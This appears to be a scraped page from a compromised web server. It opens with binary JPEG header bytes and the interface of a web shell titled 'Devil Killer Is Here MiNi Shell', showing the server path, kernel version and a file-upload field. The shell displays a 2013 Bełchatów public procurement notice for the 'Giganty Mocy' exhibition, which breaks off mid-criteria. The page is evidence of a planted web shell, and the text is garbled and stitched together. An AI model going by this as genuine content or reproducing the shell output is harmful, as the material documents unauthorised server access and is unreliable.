JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130109/12828-N-2013.html

<p class="kh_header"><b>Bełchatów: Wykonanie oraz dostawa i montaż elementów ekspozycji Giganty Mocy wraz ze sprzętem niezbędnym  do właściwej  prezentacji  całości ekspozycji, w tym  sprzętem multimedialnym, oprogramowaniem komputerowym, nagłośnieniem, oświetleniem itd., oraz  wykonaniem  portalu  internetowego w ramach projektu Budowa Miejskiego Centrum Kultury wraz z ekspozycją Giganty Mocy.</b><br>
<b>Numer ogłoszenia: 12828 - 2013; data zamieszczenia: 09.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bełchatów reprezentowane przez Prezydenta Miasta Bełchatowa , ul. T. Kościuszki 1, 97-400 Bełchatów, woj. łódzkie, tel. 044 7335198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie oraz dostawa i montaż elementów ekspozycji Giganty Mocy wraz ze sprzętem niezbędnym  do właściwej  prezentacji  całości ekspozycji, w tym  sprzętem multimedialnym, oprogramowaniem komputerowym, nagłośnieniem, oświetleniem itd., oraz  wykonaniem  portalu  internetowego w ramach projektu Budowa Miejskiego Centrum Kultury wraz z ekspozycją Giganty Mocy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie w trybie dialogu konkurencyjnego na wykonanie oraz dostawę i montaż elementów ekspozycji Giganty Mocy wraz ze sprzętem niezbędnym do właściwej prezentacji całości ekspozycji, w tym sprzętem multimedialnym, oprogramowaniem komputerowym, nagłośnieniem, oświetleniem itd., oraz wykonaniem portalu internetowego w ramach projektu Budowa Miejskiego Centrum Kultury wraz z ekspozycją Giganty Mocy, zadanie realizowane z  wykorzystaniem środków EFRR w ramach RPO Województwa Łódzkiego na lata 2007-2013.
W ramach zadania wykonane zostaną
1. Projekty i realizacja wizualizacji i animacji komputerowych.
2. Projekt i wykonanie aranżacji wnętrza sali zabaw dla dzieci
 3. Projekty i realizacja gier oraz eksponatów interaktywnych.
4. Projekt i realizacja interaktywnych gier multimedialnych, w tym z wykorzystaniem systemu kinect oraz sterowania z oryginalnego pulpitu z nastawni bloku energetycznego /zabudowa w pulpicie niezbędnego sprzętu komputerowego/.
5. Wykonanie makiet i modeli koparki: kołowej SchRs4600, zwałowarki ZGOT-15400.120, obudowy zespołu turbiny i generatora, rzeźby terenu.
6. Opracowanie i wykonanie stanowisk doświadczalnych w strefie Turbiny i generatora wraz z dostawą i montażem niezbędnych urządzeń.
7. Projekt i wykonanie portalu internetowego.
8.  Dostawa i montaż sprzętu niezbędnego dla prawidłowej prezentacji całości ekspozycji /komputery, rzutniki, monitory, telewizory, ekrany, nagłośnienie, oświetlenie ekspozycyjne, system kart magnetycznych itp./
9.  Projekty i realizacja wolnostojących i naściennych tablic informacyjnych oraz paneli ekspozycyjnych.
10. Projekty i wykonanie eksponatów do szafek i gablot ekspozycyjnych.


Szacunkowa wartość zamówienia 800 000,00 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.21.25.20-0, 72.21.29.00-8, 79.82.25.00-7, 72.41.30.00-8, 34.99.94.00-0, 37.00.00.00-8, 37.52.00.00-9, 37.52.70.00-8, 37.52.41.00-8, 37.52.46.00-3, 32.30.00.00-6, 32.35.00.00-1, 32.34.00.00-8, 32.32.00.00-2, 32.32.10.00-9, 30.23.60.00-2, 48.82.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy udokumentują, iż  w okresie ostatnich trzech lat  przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wykonali  należycie     minimum     
 
- 3  modele maszyn o wartości minimum 10 000,00  zł netto każdy,
- gry multimedialnej o wartości minimum 10 000,00 zł netto 
- dostawę i montaż sprzętu multimedialnego, w tym ekranów, projektorów, nagłośnienia i sprzętu komputerowego  o wartości minimum 100 000,00 zł netto,
- wykonali  portal internetowy o wartości minimum 5 000,00 zł netto. 



 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU  
   DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW. 

Warunki udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące 
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.


 

VI.1) Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania.

Opis sposobu dokonywania oceny spełniania tego  warunku .

Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. 


VI.2) Wiedza i doświadczenie
Opis sposobu dokonywania oceny spełniania tego warunku 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy udokumentują, iż  w okresie ostatnich trzech lat  przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wykonali  należycie     minimum      

- 3  modele maszyn o wartości minimum 10 000,00  zł netto każdy,
- grę multimedialną o wartości minimum 10 000,00 zł netto.
- dostawę i montaż sprzętu multimedialnego, w tym ekranów, projektorów, nagłośnienia i sprzętu komputerowego  o wartości minimum 100 000,00 zł netto,
- wykonali portalu internetowego o wartości minimum 5 000,00 zł netto. 

Dokumenty potwierdzające wykonanie zadań z należytą starannością - referencje, protokoły odbiorów, lub inne dokumenty potwierdzające zakres i wartość wykonanych prac. 






 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
 
VI.3) Potencjał techniczny
Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. 

VI.3) Osoby zdolne do wykonania zamówienia
 Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. 

VI.4) Sytuacja ekonomiczna i finansowa
Opis sposobu dokonywania oceny spełniania tego waru
   Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu -zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. 
           


Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. 

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń metodą spełnia / nie spełnia. 
        




VII. WYKAZ  DOKUMENTÓW JAKICH OFERENCI ZOBOWIĄZANI SĄ 
        ZAŁĄCZYĆ DO OFERTY.

A. W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art.22 ust.1  
     ustawy /opisanych w pkt VII SIWZ/ oraz w celu wykazania braku podstaw do  
     wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o 
     których mowa w art.24 ust.1 ustawy- zamawiający żąda następujących dokumentów

      1.   oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo 
            zamówień  publicznych, /art. 44 ustawy  Pzp /.

           W przypadku wykonawców  wspólnie ubiegających się o zamówienie oświadczenie  
           może być złożone wspólnie -wzór oświadczenia  stanowi załącznik do SIWZ

2.	wykaz wykonanych , a w przypadku  świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie  niezbędnym  do wykazania   spełniania  warunku wiedzy i doświadczenia w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności  jest krótszy  - w tym okresie , z podaniem  ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem  dokumentu  potwierdzającego, że te usługi zostały lub są wykonywane  wykonane należycie . 

           W przypadku wykonawców  wspólnie ubiegających się o zamówienie oświadczenie  
           może być złożone wspólnie.

3.	oświadczenie o braku podstaw do wykluczenia.

W przypadku wykonawców  wspólnie ubiegających się o zamówienie oświadczenie  
takie składa  każdy z wykonawców oddzielnie -wzór oświadczenia  stanowi załącznik do SIWZ.

4.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia wykonawcy w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy.
           
W przypadku wykonawców  wspólnie ubiegających się o zamówienie dokument ten 
składa  każdy z wykonawców oddzielnie. 
            
     
7.	 jeżeli wykonawca przewiduje udział  podwykonawców określi rzeczowo-finansowy  
 zakres usług, które zamierza  powierzyć do realizacji podwykonawcom.    


Podmioty zagraniczne

W przypadku złożenia oferty przez podmioty zagraniczne dokumenty, o których mowa  w   pkt VII SIWZ, zastępuje się je odpowiednimi dokumentami - zgodnie z  Rozporządzeniem  Prezesa Rady Ministrów z dnia 30 grudnia 2009 roku  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz. U. z 2009 r., Nr 226, 1817), tj.:

     	W  przypadku wykonawcy mającego siedzibę lub miejsce zamieszkania poza  terytorium Rzeczypospolitej Polskiej zamiast dokumentu określonych w pkt VII ppkt  3  składa dokumenty  lub dokument  wystawione w kraju , w którym ma siedzibę  lub miejsce zamieszkania, potwierdzające odpowiednio , że: 
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości- wystawionego/nych nie wcześniej 
   niż 6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w 
   postępowaniu o udzielenie zamówienia albo składania ofert;


	Jeżeli w miejscu zamieszkania  osoby, lub  w kraju, w którym wykonawca ma siedzibę  lub miejsce zamieszkania , nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym  oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo  organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania  osoby lub kraju, w którym wykonawca  ma siedzibę  lub miejsce zamieszkania.  


	Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium  Rzeczypospolitej Polskiej, osoby , o których mowa  w art. 24 ust. 1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej , wykonawca składa w odniesieniu do nich  zaświadczenie  właściwego  organu sądowego  albo administracyjnego  miejsca zamieszkania  dotyczące niekaralności  tych osób w zakresie  określonym  w art. 24 ust. 1  pkt 5-8 ustawy , wystawione nie wcześniej  niż 6 miesięcy  przed upływem terminu  składania wniosków  o dopuszczenie  do udziału w postępowaniu  o udzielenie zamówienia  albo składania ofert, z tym, że  w przypadku  gdy w miejscu  zamieszkania tych osób nie wydaje się takich  zaświadczeń- zastępuje się je dokumentem  zawierającym  oświadczenie  złożone  przed notariuszem , właściwym organem sądowym, administracyjnym albo  organem samorządu  zawodowego  lub gospodarczego miejsca zamieszkania tych osób.

Wartości podane w dokumentach w walutach innych niż wskazane przez zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu. 

		
	Dokumenty w/w powinny zostać złożone w oryginale lub kopii	poświadczonej za zgodność z oryginałem, przez wykonawcę na każdej stronie zawierającej informacje.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Do udziału w dialogu konkurencyjnym dopuszczonych zostanie 3 Wykonawców, którzy uzyskają największą liczbę punktów przyznanych na podstawie oceny wymaganych dokumentów i oświadczeń, zgodnie z poniższą metodologią:
Kryterium 1. 
a) Wykonanie 3 modeli maszyn każdy o wartości minimum 10 000,00  zł netto  - 1 punkt,
b) Wykonanie 4 modeli maszyn każdy o wartości minimum 10 000,00  zł netto- 2 punkty.
c) Wykonanie 5 lub więcej modeli maszyn każdy o wartości minimum 10 000,00  zł netto - 3 punkty. 
Możliwość uzyskania punktów dla kryterium 1 - minimum 1 punkt, maksimum 3 punkty.

Kryterium 2.
a) wykonanie 1 gry multimedialnej, o wartości minimum 10 000,00 zł netto.  - 1 punkt,
b) wykonanie 2 gier multimedialnych, każda o wartości minimum 10 000,00 zł netto.  - 2 punkty,
c) wykonanie 3 lub więcej gier multimedialnych, każda o wartości minimum 10 000,00 zł netto.  - 3 punkty, 
Możliwość uzyskania punktów dla kryterium 2 - minimum 1 punkt maksimum 3 punkty

Łączna możliwa do uzyskania suma punktów to:
Minimum - 2 punkty, maksimum - 6 punktów.

UWAGA: 
W poszczególnych kryteriach Wykonawca może uzyskać punkty wynikające wyłącznie z jednego podpunktu tj. a, b lub c.

W przypadku, gdy do postępowania przystąpi mniej niż trzech Wykonawców spełniających kryteria formalne, Zamawiający zakwalifikuje ich wszystkich bez konieczności oceny powyższych kryteriów.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
